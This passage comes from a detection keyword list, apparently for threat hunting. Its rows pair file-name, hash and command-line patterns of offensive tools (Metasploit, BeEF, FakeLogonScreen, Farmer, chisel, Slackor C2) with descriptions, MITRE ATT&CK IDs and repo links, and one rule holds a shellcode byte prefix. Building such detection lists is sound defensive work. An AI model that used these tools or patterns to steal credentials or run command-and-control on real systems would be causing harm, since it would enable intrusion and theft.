designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*fake_default_wordlist.txt*",".{0,1000}fake_default_wordlist\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*fake_evernote_clipper*",".{0,1000}fake_evernote_clipper.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*fake_flash_update*",".{0,1000}fake_flash_update.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*fake_hostnames(hostnames_list)*",".{0,1000}fake_hostnames\(hostnames_list\).{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","0","N/A","10","7","613","239","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*fake_lastpass/*",".{0,1000}fake_lastpass\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*fake_notification_ff/*",".{0,1000}fake_notification_ff\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*FakeAMSI.c*",".{0,1000}FakeAMSI\.c.{0,1000}","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*FakeAMSI.dll*",".{0,1000}FakeAMSI\.dll.{0,1000}","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*FakeAMSI.exe*",".{0,1000}FakeAMSI\.exe.{0,1000}","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. 
processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*FakeCmdLine.*",".{0,1000}FakeCmdLine\..{0,1000}","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","1","N/A","N/A","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*FakeCmdLine.exe*",".{0,1000}FakeCmdLine\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Fake-Cmdline.exe*",".{0,1000}Fake\-Cmdline\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - 
T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*FakeDriver.java*",".{0,1000}FakeDriver\.java.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*FakeDriver2.java*",".{0,1000}FakeDriver2\.java.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*fakefuse.c*",".{0,1000}fakefuse\.c.{0,1000}","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","363","58","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" "*fakefuse.h*",".{0,1000}fakefuse\.h.{0,1000}","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","363","58","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" "*FakeImageExploiter*",".{0,1000}FakeImageExploiter.{0,1000}","offensive_tool_keyword","FakeImageExploiter","This module takes one existing image.jpg and one payload.ps1 (input by user) and builds a new payload (agent.jpg.exe) that if executed it will trigger the download of the 2 previous files stored into apache2 (image.jpg + payload.ps1) and execute them.","T1564 - T1218 - T1204 - T1558.001","TA0002 - TA0008 - TA0010","N/A","N/A","Phishing","https://github.com/r00t-3xp10it/FakeImageExploiter","1","1","N/A","N/A","9","875","343","2019-12-06T20:59:26Z","2017-04-04T20:53:47Z" "*fakelogonscreen *",".{0,1000}fakelogonscreen\s.{0,1000}","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. 
The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","N/A","N/A","10","1273","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" "*fakelogonscreen*.zip*",".{0,1000}fakelogonscreen.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1273","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" "*FakeLogonScreen.csproj*",".{0,1000}FakeLogonScreen\.csproj.{0,1000}","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1273","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" "*fakelogonscreen.exe*",".{0,1000}fakelogonscreen\.exe.{0,1000}","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. 
The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1273","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" "*FakeLogonScreen.sln*",".{0,1000}FakeLogonScreen\.sln.{0,1000}","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1273","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" "*fakepath31337*",".{0,1000}fakepath31337.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*FakePPID.*",".{0,1000}FakePPID\..{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" 
"*fake-sms-main*",".{0,1000}fake\-sms\-main.{0,1000}","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2663","176","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" "*faketime '202* zsh*",".{0,1000}faketime\s\'202.{0,1000}\szsh.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*FalconForceTeam/SOAPHound*",".{0,1000}FalconForceTeam\/SOAPHound.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","1","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*farmer.exe *\windows\temp*",".{0,1000}farmer\.exe\s.{0,1000}\\windows\\temp.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. 
Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*farmer.exe 8888 60*",".{0,1000}farmer\.exe\s8888\s60.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*Farmer\Farmer.csproj*",".{0,1000}Farmer\\Farmer\.csproj.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*Farmer-main.zip*",".{0,1000}Farmer\-main\.zip.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. 
Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","1","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*fastfuz-chrome-ext*files.txt*",".{0,1000}fastfuz\-chrome\-ext.{0,1000}files\.txt.{0,1000}","offensive_tool_keyword","fastfuzz","Fast fuzzing websites with chrome extension","T1110","TA0006","N/A","N/A","Web Attacks","https://github.com/tismayil/fastfuz-chrome-ext","1","1","N/A","N/A","1","25","3","2022-02-04T02:15:51Z","2022-02-04T00:22:51Z" "*FastjsonScan.jar*",".{0,1000}FastjsonScan\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*fasttrack/wordlist.txt*",".{0,1000}fasttrack\/wordlist\.txt.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*favfreak-http*",".{0,1000}favfreak\-http.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*FB351327-0816-448B-8FB7-63B550D6C808*",".{0,1000}FB351327\-0816\-448B\-8FB7\-63B550D6C808.{0,1000}","offensive_tool_keyword","SimpleNTSyscallFuzzer","Fuzzer for Windows kernel syscalls.","T1055.011 - T1218","TA0005 - 
TA0007","N/A","N/A","Discovery","https://github.com/waleedassar/SimpleNTSyscallFuzzer","1","0","N/A","7","2","114","22","2024-01-25T02:39:31Z","2022-03-12T10:16:30Z" "*fb4a9c6269ea58b893c6978105fd3e2b2bc6e72e24715c1824b45f40c87b850d*",".{0,1000}fb4a9c6269ea58b893c6978105fd3e2b2bc6e72e24715c1824b45f40c87b850d.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*fb6a2914759e6644c5067b1b7308bc295d4b6b357b1ad9f904b430ba588654f8*",".{0,1000}fb6a2914759e6644c5067b1b7308bc295d4b6b357b1ad9f904b430ba588654f8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*fb808cc0dbbe0b6cd1a58631befb038483fc3043175232cf7d5f9a0d29b31895*",".{0,1000}fb808cc0dbbe0b6cd1a58631befb038483fc3043175232cf7d5f9a0d29b31895.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" 
"*fb8b5d212f449a8ba61ab9ed9b44853315c33d12a07f8ce4642892750e251530*",".{0,1000}fb8b5d212f449a8ba61ab9ed9b44853315c33d12a07f8ce4642892750e251530.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*fb8c1454ea22ccc9d97cbd90692d38c3c63d551680f6632fe658598a9bb23c03*",".{0,1000}fb8c1454ea22ccc9d97cbd90692d38c3c63d551680f6632fe658598a9bb23c03.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*fbb4a1a49a0683247e83da8d2ccd4bdab51516a0a5cacbf6ff759213792e58e2*",".{0,1000}fbb4a1a49a0683247e83da8d2ccd4bdab51516a0a5cacbf6ff759213792e58e2.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation 
tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*fbbc07b9b6d448c80d5bb8a086d715631b78e30eb10cb850601317b21256fb8d*",".{0,1000}fbbc07b9b6d448c80d5bb8a086d715631b78e30eb10cb850601317b21256fb8d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*fbcbcfae5662f9f0dfbf7f5cb31c052399382232a51554197f4554d1bb06332f*",".{0,1000}fbcbcfae5662f9f0dfbf7f5cb31c052399382232a51554197f4554d1bb06332f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*fbd415807cca02732e2b7b7ad2d8fd09db1ab75953fe24fe7b6238f691c6e5a8*",".{0,1000}fbd415807cca02732e2b7b7ad2d8fd09db1ab75953fe24fe7b6238f691c6e5a8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*FC 48 83 E4 F0 E8 CC 00 00 00 41 51 41 50 52 48 31 D2 51 65 48 8B 52 60 48 8B 52 18 48 8B 52 20*",".{0,1000}FC\s48\s83\sE4\sF0\sE8\sCC\s00\s00\s00\s41\s51\s41\s50\s52\s48\s31\sD2\s51\s65\s48\s8B\s52\s60\s48\s8B\s52\s18\s48\s8B\s52\s20.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","#yara rule","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*fc04cd7b616aa8a43a35a5318a9454f4228c74b056bfa07ec14105d249593e35*",".{0,1000}fc04cd7b616aa8a43a35a5318a9454f4228c74b056bfa07ec14105d249593e35.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*fc1ca88117a5a0328991e63be9340c949d22a25f53134d04c1ffc7be2ed69e6a*",".{0,1000}fc1ca88117a5a0328991e63be9340c949d22a25f53134d04c1ffc7be2ed69e6a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*fc52dac4f484c090d99d8b142ed41ed3368938955dfc25d76cd4f290bb6c59d5*",".{0,1000}fc52dac4f484c090d99d8b142ed41ed3368938955dfc25d76cd4f290bb6c59d5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*FC5A1C5A-65B4-452A-AA4E-E6DCF1FA04FB*",".{0,1000}FC5A1C5A\-65B4\-452A\-AA4E\-E6DCF1FA04FB.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" 